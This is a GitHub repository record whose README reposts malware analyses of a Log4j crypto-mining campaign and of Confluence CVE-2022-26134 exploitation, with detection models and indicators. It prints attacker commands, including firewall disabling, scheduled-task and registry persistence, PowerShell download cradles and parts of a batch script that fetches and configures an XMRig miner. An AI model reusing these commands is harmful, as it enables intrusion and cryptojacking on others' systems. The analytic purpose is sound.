{"id":19915546,"url":"https://github.com/demining/log4j-vulnerability","last_synced_at":"2025-09-06T16:45:19.395Z","repository":{"id":144620955,"uuid":"595794114","full_name":"demining/Log4j-Vulnerability","owner":"demining","description":"Vulnerability CVE-2021-44228 allows remote code execution without authentication for several versions of Apache Log4j2 (Log4Shell). Attackers can exploit vulnerable servers by connecting over any protocol, such as HTTPS, and sending a specially crafted string.","archived":false,"fork":false,"pushed_at":"2023-01-31T20:35:59.000Z","size":2993,"stargazers_count":6,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-11T23:21:18.988Z","etag":null,"topics":["attack","bitcoin","blockchain","cve-2021-44228","hack","hacking","log4j","log4js","log4shell","mining","vulnerability","vulnerability-scanner","vulnerable"],"latest_commit_sha":null,"homepage":"https://cryptodeeptech.ru/log4j-vulnerability","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/demining.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-01-31T20:29:26.000Z","updated_at":"2024-08-12T20:29:35.000Z","dependencies_parsed_at":null,"dependency_job_id":"13d7948f-de14-48fb-a89d-f7ea5eda6e5e","html_url":"https://github.com/demining/Log4j-Vulnerability","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/demining%2FLog4j-Vulnerability/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/demining","download_url":"https://codeload.github.com/demining/Log4j-Vulnerability/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241343509,"owners_count":19947398,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["attack","bitcoin","blockchain","cve-2021-44228","hack","hacking","log4j","log4js","log4shell","mining","vulnerability","vulnerability-scanner","vulnerable"],"created_at":"2024-11-12T21:40:52.626Z","updated_at":"2025-03-01T09:21:50.517Z","avatar_url":"https://github.com/demining.png","language":"JavaScript","readme":"\n# Log4j Vulnerability\n\n---\n\n\n---\n\n\n\n\n\n\u003cfigure class=\"aligncenter size-large\"\u003e\u003cimg decoding=\"async\" width=\"1024\" height=\"576\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/032-1024x576.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-1873\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1024x576.png 1024w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-300x169.png 300w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-768x432.png 768w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032.png 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n---\n\n\n* Tutorial: https://youtu.be/PNDBjoT83zA\n* Tutorial: https://cryptodeeptech.ru/log4j-vulnerability\n\n\n---\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch3\u003eBackground on Log4j\u003c/h3\u003e\n\n\n\n\u003cp\u003eAlibaba Cloud Security Team publicly disclosed a critical vulnerability \u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e(CVE-2021-44228)\u003c/a\u003e enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by attackers connecting via any protocol such as HTTPS and sending a specially crafted string.\u003c/p\u003e\n\n\n\n\u003ch3\u003eLog4j crypto-mining campaign\u003c/h3\u003e\n\n\n\n\u003cp\u003eDarktrace detected crypto-mining on multiple customer deployments which occurred as a result of exploiting this Log4j vulnerability. In each of these incidents, exploitation occurred via outbound SSL connections which appear to be requests for base64-encoded PowerShell scripts to bypass perimeter defenses and download batch (.bat) script files, and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMWare Horizons servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. Following successful exploitation, the server performs a callback on port 1389, retrieving a script named mad_micky.bat. This achieves the following:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eDisables Windows firewall by setting all profiles to state=off\u003cbr\u003e‘netsh advfirewall set allprofiles state off’\u003c/li\u003e\n\n\n\n\u003cli\u003eSearches for existing processes that indicate other miner installs using ‘netstat -ano | findstr TCP’ to identify any process operating on ports :3333, :4444, :5555, :7777, :9000 and stop the processes running\u003c/li\u003e\n\n\n\n\u003cli\u003eA new webclient is initiated to silently download wxm.exe\u003c/li\u003e\n\n\n\n\u003cli\u003eScheduled tasks are used to create persistence. The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ schedules a task and suppresses warnings, the task is to be scheduled within a minute of command and given the name, ‘BrowserUpdate’, pointing to malicious domain, ‘b.oracleservice[.]top’ and hard-coded IP’s: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080\u003c/li\u003e\n\n\n\n\u003cli\u003eRegistry keys are added in RunOnce for persistence: reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Run2 /d\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eIn at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent only seen during this activity it is suspicious.\u003c/p\u003e\n\n\n\n\u003cp\u003eFollowing successful exploitation, the server performs a callback on port 1389, to retrieve script files. In this example, /xms.ps1 a base-64 encoded PowerShell script that bypasses execution policy on the host to call for ‘mad_micky.bat’:\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a548a73d901f998b427c_1-1.jpeg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 1: Additional insight on PowerShell script xms.ps1\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download:\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a5485d3ddb97cd7d959a_1-2.jpeg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 2: Log data highlighting mad_micky.bat file\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eAdditional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses located in Korea and Ukraine. A connection was made to the Ukrainian IP to download executable file xm.exe, which activates the miner. The miner, XMRig Miner (in this case) is an open source, cross-platform mining tool available for download from multiple public locations. The next observed exe download was for ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4).\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a548633c395a4ad861e7_1-3.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 3: Additional insight regarding XMRig executable\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes running tasks associated with logging, including SCM event log filter or PowerShell event log consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The log deletes were conducted through scheduled tasks and WMI included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer.\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eConfig file (no longer hosted): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eThe second file requested from Pastebin, though no longer hosted by Pastebin, is part of a schtasks command, and so probably used to establish persistence:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eschtasks /create /sc MINUTE /mo 5 /tn \u0026nbsp;“\\Microsoft\\windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 32” /tr “c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” \u0026nbsp;/F /ru System\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eThe executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this cmd.exe and wmic commands were used to configure the miner.\u003c/p\u003e\n\n\n\n\u003cp\u003eThese file downloads and miner configuration were followed by additional connections to Pastebin.\u003c/p\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62d2a54849ba531521cac33f_1-4.jpeg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eFigure 4: OSINT correlation of mad_micky.bat file\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch3\u003eProcess specifics — mad_micky.bat file\u003c/h3\u003e\n\n\n\n\u003ch4\u003eInstall\u003c/h4\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eset “STARTUP_DIR=%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup”\nset “STARTUP_DIR=%USERPROFILE%\\Start Menu\\Programs\\Startup”\n\nlooking for the following utilities: powershell, find, findstr, tasklist, sc\nset “LOGFILE=%USERPROFILE%\\mimu6\\xmrig.log”\nif %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 \u0026amp; goto PORT_OK)\nif %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 \u0026amp; goto PORT_OK)\nset port=10001\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch4\u003ePreparing miner\u003c/h4\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eecho [*] Removing previous mimu miner (if any)\nsc stop gado_miner\nsc delete gado_miner\ntaskkill /f /t /im xmrig.exe\ntaskkill /f /t/im logback.exe\ntaskkill /f /t /im network02.exe\n:REMOVE_DIR0\necho [*] Removing “%USERPROFILE%\\mimu6” directory\ntimeout 5\nrmdir /q /s “USERPROFILE%\\mimu6” \u0026gt;NUL 2\u0026gt;NUL\nIF EXIST “%USERPROFILE%\\mimu6” GOTO REMOVE_DIR0\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch4\u003eDownload of XMRIG\u003c/h4\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eecho [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\\xmrig.zip”\npowershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\\xmrig.zip’)”\necho copying to mimu directory\nif errorlevel 1 (\necho ERROR: Can’t download MoneroOcean advanced version of xmrig\ngoto MINER_BAD)\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch4\u003eUnpack and install\u003c/h4\u003e\n\n\n\n\u003cp\u003e\u003c/p\u003e\n\n\n\n\u003cpre class=\"wp-block-code\"\u003e\u003ccode\u003eecho [*] Unpacking “%USERPROFILE%\\xmrig.zip” to “%USERPROFILE%\\mimu6”\npowershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\\xmrig.zip’, ‘%USERPROFILE%\\mimu6’)”\nif errorlevel 1 (\necho [*] Downloading 7za.exe to “%USERPROFILE%za.exe”\npowershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”\n\npowershell -Command “$out = cat ‘%USERPROFILE%\\mimu6\\config.json’ | %%{$_ -replace ‘\\”url\\”: *\\”.*\\”,’, ‘\\”url\\”: \\”207.38.87[.]6:3333\\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\\mimu6\\config.json’”\npowershell -Command “$out = cat ‘%USERPROFILE%\\mimu6\\config.json’ | %%{$_ -replace ‘\\”user\\”: *\\”.*\\”,’, ‘\\”user\\”: \\”%PASS%\\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\\mimu6\\config.json’”\npowershell -Command “$out = cat ‘%USERPROFILE%\\mimu6\\config.json’ | %%{$_ -replace ‘\\”pass\\”: *\\”.*\\”,’, ‘\\”pass\\”: \\”%PASS%\\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\\mimu6\\config.json’”\npowershell -Command “$out = cat ‘%USERPROFILE%\\mimu6\\config.json’ | %%{$_ -replace ‘\\”max-cpu-usage\\”: *\\d*,’, ‘\\”max-cpu-usage\\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\\mimu6\\config.json’”\nset LOGFILE2=%LOGFILE:\\=\\\\%\npowershell -Command “$out = cat ‘%USERPROFILE%\\mimu6\\config.json’ | %%{$_ -replace ‘\\”log-file\\”: *null,’, ‘\\”log-file\\”: \\”%LOGFILE2%\\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\\mimu6\\config.json’”\nif %ADMIN% == 1 goto ADMIN_MINER_SETUP\n\nif exist “%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup” (\nset “STARTUP_DIR=%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup”\ngoto STARTUP_DIR_OK\n)\nif exist “%USERPROFILE%\\Start Menu\\Programs\\Startup” (\nset “STARTUP_DIR=%USERPROFILE%\\Start Menu\\Programs\\Startup”\ngoto STARTUP_DIR_OK\n)\necho [*] Downloading tools to make gado_miner service to “%USERPROFILE%\\nssm.zip”\npowershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\\nssm.zip’)”\nif errorlevel 1 (\necho ERROR: Can’t download tools to make gado_miner service\nexit /b 1\u003c/code\u003e\u003c/pre\u003e\n\n\n\n\u003ch3\u003eDetecting the campaign using Darktrace\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe key model breaches Darktrace used to identify this campaign include compromise-focussed models for\u0026nbsp;\u003cem\u003eApplication Protocol on Uncommon Port\u003c/em\u003e,\u0026nbsp;\u003cem\u003eOutgoing Connection to Rare From Server\u003c/em\u003e, and\u0026nbsp;\u003cem\u003eBeaconing to Rare Destination\u003c/em\u003e. File-focussed models for\u0026nbsp;\u003cem\u003eMasqueraded File Transfer\u003c/em\u003e,\u0026nbsp;\u003cem\u003eMultiple Executable Files and Scripts from Rare Locations\u003c/em\u003e, and\u0026nbsp;\u003cem\u003eCompressed Content from Rare External Location\u003c/em\u003e. Cryptocurrency mining is detected under the\u0026nbsp;\u003cem\u003eCryptocurrency Mining Activity\u003c/em\u003e\u0026nbsp;models.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe models associated with\u0026nbsp;\u003cem\u003eUnusual PowerShell to Rare and New User Agent\u003c/em\u003e\u0026nbsp;highlight the anomalous connections on the infected devices following the Log4j callbacks.\u003c/p\u003e\n\n\n\n\u003cp\u003eCustomers with Darktrace’s\u0026nbsp;\u003ca href=\"https://www.darktrace.com/en/autonomous-response\"\u003eAutonomous Response\u003c/a\u003e\u0026nbsp;technology, Antigena, also had actions to block the incoming files and scripts downloaded and restrict the infected devices to normal pattern of life to prevent both the initial malicious file downloads and the ongoing crypto-mining activity.\u003c/p\u003e\n\n\n\n\u003ch3\u003eAppendix\u003c/h3\u003e\n\n\n\n\u003ch4\u003eDarktrace model detections\u003c/h4\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eAnomalous Connection / Application Protocol on Uncommon Port\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous Connection / New User Agent to IP Without Hostname\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous Connection / PowerShell to Rare External\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / EXE from Rare External location\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Masqueraded File Transfer\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Multiple EXE from Rare External Locations\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Script from Rare External Location\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous File / Zip or Gzip from Rare External Location\u003c/li\u003e\n\n\n\n\u003cli\u003eAnomalous Server Activity / Outgoing from Server\u003c/li\u003e\n\n\n\n\u003cli\u003eCompliance / Crypto Currency Mining Activity\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Agent Beacon (Long Period)\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Agent Beacon (Medium Period)\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Agent Beacon (Short Period)\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Beacon to Young Endpoint\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Beaconing Activity To External Rare\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Crypto Currency Mining Activity\u003c/li\u003e\n\n\n\n\u003cli\u003eCompromise / Sustained TCP Beaconing Activity To Rare Endpoint\u003c/li\u003e\n\n\n\n\u003cli\u003eDevice / New PowerShell User Agent\u003c/li\u003e\n\n\n\n\u003cli\u003eDevice / Suspicious Domain\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003ch4\u003eMITRE ATT\u0026amp;CK techniques observed\u003c/h4\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62ea70a286d2172d033147de_mitre CobaltStrike .jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003ch4\u003eIoCs\u003c/h4\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62f11eea9576fd4b2e26c440_iocs 1 log4j.jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62f11ef37345022b8dfb2403_iocs 2 log4j.jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003cfigure class=\"wp-block-image\"\u003e\u003cimg decoding=\"async\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/62f11efdb7ece0f3fab42a28_iocs 3 log4j.jpg\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\"\u003e\u003c/figure\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp\u003eOn May 31, a critical unpatched vulnerability, which affects all confluence server and data center supported versions was\u0026nbsp;\u003ca href=\"https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\"\u003ereported\u003c/a\u003e\u0026nbsp;to Atlassian by Volexity, a security company.\u003c/p\u003e\n\n\n\n\u003cp\u003eAtlassian\u0026nbsp;\u003ca href=\"https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\"\u003ewarned\u003c/a\u003e\u0026nbsp;their customers of the critical vulnerability on June 2 and issued a patch a day later. CISA added this vulnerability to their list of Known Exploited Vulnerabilities on June 3.\u003c/p\u003e\n\n\n\n\u003cp\u003eCheck Point released a dedicated protection to prevent an attack exploiting this vulnerability and advises customers to patch the affected systems.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThe Vulnerability\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe vulnerability in the Atlassian Confluence and Data Center, designated as \u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eCVE-2022-26134\u003c/a\u003e, may lead to an unauthenticated Object-Graph Navigation Language (OGNL) expression injection attack.\u003c/p\u003e\n\n\n\n\u003cp\u003eA remote, unauthenticated attacker can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y1.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"639\" height=\"114\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28249\"\u003eFigure 1: Malicious payload that exploits \u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eCVE-2022-26134\u003c/a\u003e.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eIn The Wild Exploitation\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eCheck Point Research (CPR) researchers noticed a large number of exploitations attempts since the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. After a few days, the attackers started to use the vulnerability to download malware to the affected systems.\u003c/p\u003e\n\n\n\n\u003cp\u003eAmong the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe infection chain depends on the victim’s operating system.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThe Linux OS Targeted Attack\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y2.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"654\" height=\"115\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28250\"\u003eFigure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe base64 string decodes into another base64 encoded string. Overall, researchers had to decode the string a few times to get the actual payload.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y3.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"319\" height=\"360\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28251\"\u003eFigure 3: The decoded base64 string.\u003c/p\u003e\n\n\n\n\u003cp\u003eThis script downloads a bash script file called\u0026nbsp;\u003cem\u003exms\u003c/em\u003e\u0026nbsp;from the remote C\u0026amp;C server to the victim’s tmp folder, executes it, and deletes it afterward.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y4.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"602\" height=\"277\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28252\"\u003eFigure 4: Part of the malicious xms script.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003cem\u003exms\u003c/em\u003e\u0026nbsp;file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot.\u003c/p\u003e\n\n\n\n\u003cp\u003eIn addition, a network connectivity test to a[.]oracleservice.top is performed constantly.\u003c/p\u003e\n\n\n\n\u003cp\u003eIn an attempt to spread to other machines, the script searches for ssh keys and tries to connect. It then downloads the xms file from the C\u0026amp;C server and executes it.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe script downloads an elf executable file called\u0026nbsp;\u003cem\u003edbused\u0026nbsp;\u003c/em\u003eto the\u003cem\u003e\u0026nbsp;tmp\u0026nbsp;\u003c/em\u003efolder in various remote IPs.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003cem\u003edbused\u003c/em\u003e\u0026nbsp;file is packed using upx to avoid static detection.\u003c/p\u003e\n\n\n\n\u003cp\u003eThe elf file is a crypto miner that exhausts the victim machine’s resources:\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/y5.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" width=\"532\" height=\"113\"\u003e\u003c/p\u003e\n\n\n\n\u003cp id=\"caption-attachment-28253\"\u003eFigure 5: The dbused process exhausts the system resources.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eThe Windows OS Targeted Attack\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003eThe attacker utilized the Atlassian vulnerability to execute a PowerShell download cradle to initiate a fileless attack from a remote C\u0026amp;C server.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cimg decoding=\"async\" loading=\"lazy\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j 